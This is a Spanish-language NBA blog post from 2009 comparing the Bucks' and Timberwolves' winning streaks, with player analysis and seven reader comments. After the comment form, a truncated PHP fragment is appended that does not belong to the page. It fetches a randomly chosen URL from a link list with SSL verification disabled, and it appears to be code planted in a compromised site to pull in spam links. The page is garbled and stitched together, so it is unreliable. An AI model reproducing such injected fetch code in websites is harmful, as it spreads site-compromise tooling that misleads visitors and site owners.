Ready to rise

12 de January de 2009 por El_Pecharroman

Milwaukee Bucks y Minnesota Timberwolves son dos equipos que para mí siempre han estado interrelacionados. Será porque, en el orden alfabético, van uno sobre otro. Será porque los iconos de ambos equipos, ciervo y lobo gris, son animales de bosque americano. O tal vez porque ambas franquicias son la clase baja histórica de la Liga; los Bucks sólo han ganado la NBA en una ocasión (1971), mientras que los Timberwolves jamás han estado cerca del anillo en toda su joven historia (entraron a formar parte de la Liga en 1989).

Es por ello que la buena racha de ambos, casi paralela, me ha resultado curiosa y estimulante a la vez. Preparados para ascender de categoría, ‘ready to rise’ como pregona en portada la web de los Bucks, ambas franquicias han mostrado un buen juego materializado por un interior solvente aunque poco brillante que sirve como apoyo de un juego exterior algo más brillante.

Milwaukee Bucks ha conseguido meterse en puestos de playoff con una racha de 9-5. Dicha racha, que consolida un decente 18-21 total, puede llamar un poco a engaño: sólo se ha ganado a dos equipos de postín, San Antonio Spurs y Miami Wade (digo Heat), mientras que las derrotas se incluye alguna más bien dolorosa como Charlotte. El bloque de los Bucks es suficiente para clasificarse para el mencionado play-off, si bien es una completa utopía pretender superar la primera ronda.

Michael Redd, jugador franquicia temporada tras temporada a pesar de ser la antítesis del término (en torno a veinte puntos de media, sí, pero apenas dos asistencias y tres rebotes que demuestran poco compromiso defensivo), ha encontrado este año un compañero apropiado para el juego exterior, Luke Ridnour. No cabe duda de que el base oregoniano encajó mejor con Redd que su predecesor en el puesto Mo Williams (ahora en los Cavaliers): mejor organizador del juego, con menos tendencia a jugarse tiros que en ocasiones resultaban inapropiados por ser una especie de desafío a la jerarquía de Redd. Los suplentes de Redd y Ridnour, Charlie Bell y Roman Sessions, cumplen solventemente con su papel.

El juego interior ha conseguido, por otra parte, crecerse ante la adversidad. El descenso de la participación de Andrew Bogut debido a los problemas físicos que acabaron en lesión hace unas pocas fechas ha provocado que Scott Skiles mueva ficha y haga cambios más o menos significativos. No me refiero a las testimoniales aportaciones, rellenos, de Dan Gadzuric y el ex jugador del Barça Francisco Elson, sino al aprovechamiento total de sus ala-pivots de nivel.

Por un lado, el curtido Richard Jefferson comienza a sentirse importante en su rol de point-forward titular, si bien en ocasiones esto le lleva a jugarse más tiros de los deseables. Luc Mbah à Moute, elección 37 del draft, se ha asentado como power-forward titular (en ocasiones ha hecho las veces de center con resultado desigual) y, aunque su rendimiento ya no sea tan sorprendentemente brillante como a principios de temporada, si se podría definir su concentración como acierto absoluto. Por último, el explosivo Charlie Villanueva ha encontrado su acomodo como sexto hombre y, con unos porcentajes tirando a mediocres, realiza una aportación valiosa al juego del equipo.

Minnesota Timberwolves, por su parte, ha acumulado un balance de 7-2 que resulta excepcional, sobre todo cuando hasta esa racha el equipo norteño marcaba un paupérrimo 4-23. La clave está, sin duda, en el cambio dentro de su rotación exterior. La baja del veteranísimo Kevin Ollie ha dado entrada en la dinámica del equipo a Sebastian Telfair, la vuelta de Mike Miller ha degradado al mediocre Rashad McCants. Además, Randy Foye está atravesando un momento de forma muy dulce que le ha hecho dar un paso adelante y ganar importancia dentro de la franquicia. Ha sido el líder del equipo en los últimos partidos ganados.

Los hombres interiores de Minnesota son algo menos brillantes, aunque dan la talla más que sobradamente. Al Jefferson, center en progresión llegado desde Boston dentro del traspaso de Garnett, rebasa ya los veinte puntos y diez rebotes por partido; es básico para el equipo y, por desgracia, no tiene un sustito de garantías ni en Jason Collins ni en Calvin Booth. Como ala-pivots, junto a mediocridades oficiales tales como el ex Grizzly Brian Cardinal ó Rodney Cardney, desempeñan su labor los grises Ryan Gomes y Craig Smith.

Y ha emergido un ‘power forward’ de garantías llamado Kevin Love. Quinto del pasado draft, 20 años y 2’08 m de altura. Acumula unos nada despreciables 8 puntos y 8 rebotes en 22 minutos en el total de la temporada. En los últimos cuatro partidos victoriosos, las cifras se van a 15 puntos con porcentajes muy buenos y 11 rebotes en poco más de los 22 minutos acumulados a lo largo de la Liga. Si sigue así, tenemos candidato a titular del quinteto ideal de rookies. Pero antes habrá que ver si sigue así…

Comenta

7 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Sí que son casos interesantes, aunque a mí los Bucks me dicen más bien nada. Redd tiene mucha clase pero como dices no es jugador franquicia, y Bogut, Villanueva, Ridnour y Jefferson son jugadores muy poco fiables. Y no son suficientemente jóvenes como para esperar algo más de ellos de lo que ya han ofrecido.

    En cambio los Wolves… sí, hay un proyecto. Foye, Jefferson y Love son una buena base sobre la que construir. Además, tienen algún contrato interesante como el de Mike Miller. Aquí, al contrario que en los Bucks, sí que veo mucho margen de mejora.

    Gran artículo, enhorabuena.

      Citar

  2. Txusma dice:
    #2

    Los Wolves creo han hecho las cosas bien desde el traspaso de Garnett y se hayan en una muy buena posicion para seguir creciendo y aspirando a más cosas. Solo les ha fallado Corey Brewer aunq creo q sin la grave lesion de este año, podria haber mejorado bastante su aportacion ofensiva respecto el año anterior. La pregunta es: a toro pasado, hubierais hecho ese Mayo x Love + Miller?
    Los Bucks es lo q dice Magic: lo q ves es lo q hay y si se clasifican para Playoffs (q ya toca) estan condenados a ser eliminados en primera ronda. Esperemos a ver si no hay algun traspaso para intentar dar un pasito al frente y ponerse al nivel de Miami o Atlanta.

      Citar

  3. Viva_Dirk dice:
    #3

    Deacuerdo en lo que decís de los Wolves, tienen buena pinta aunque falta que Foye se confirme como algo mas de lo que se ha visto, porque si Bogut no es lo suficientemente joven, Foye tampoco.

    En cuanto a Milwaukee yo si que confio en que Bogut o Villanueva se asienten, ambos tienen grandes cualidades, con eso y Redd ya son un buen equipo, a lo que habria que sumar a Sessions y Ridnour, además de un muy buen jugador como Jefferson.

      Citar

  4. MagicJohnson32 dice:
    #4

    No es tanto por juventud como porque Foye lleva jugadas una temporada y media prácticamente. Y después de la lesión tan grave que tuvo ya vuelve a rendir a bastante nivel y es de esperar que siga mejorando. A mí Bogut no me da la sensación de ir ofreciendo más.

    Y Villanueva… buf, es que no me convence nada. Su talento ofensivo no creo que compense sus carencias (quiero decir, como para considerarlo un jugador importante).

      Citar

  5. Jabho dice:
    #5

    Yo estoy más en la linea de que a medio plazo los Wolves pintan mejor. Los Bucks creo que se equivocaron con el contratazo de Redd y no tienen pinta de ir muy lejos, la verdad.

    El mejor de los 2 equipos es Al Jeff para mi. Lo de Love y Mayo es pronto. Por lo visto hasta ahora no, pero llevamos media temporada escasa.

      Citar

  6. xapa_croack dice:
    #6

    Yo tambien coincidio con la opinion general, de que los wolves lo estan haciendo mejor, pero si decis que el oeste esta tan dificil la cosa, pues entonces casi que se iguala.

    Gran salto de calidad para el blog este pecharro ¡¡¡¡

      Citar

  7. portu dice:
    #7

    Mediocre McCants??? explosivo Villanueva??? en general me parece q el análisis de Minesota equivoca demasiadas posiciones como para justificar la mejoría del equipo… ni McCants es mediocre, ni Carney juega de sustituto de los pívots… creo q el cambio se debe a la mayor tranquilidad y exigencia de McHale, en un momento u otro alguien tiene q empezar a exigir a un equipo joven… y como cambio táctico lo único destcado es Telfair de 1 y Foye de 2 durante muchos minutos. McCants ha desaparecido de la rotación pq no tenía ninguna actitud en defensa, algo q no se puede permitir en un equipo donde casi nadie es excesivamente bueno en defensa. Talento hay, defnsa muy poca y físicamente no andan sobrados, les falta atleticismo como dicen los yankis en casi todas las posiciones, sobretodo tras la lesión de Brewer. Para mi el cambio es un cambo de actitud principalmente con algún pequeño cambio táctico como lo de Foye de 2, pero ojo, q eso ya lo habían hecho los Wolves anteriomente y no funcionó.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>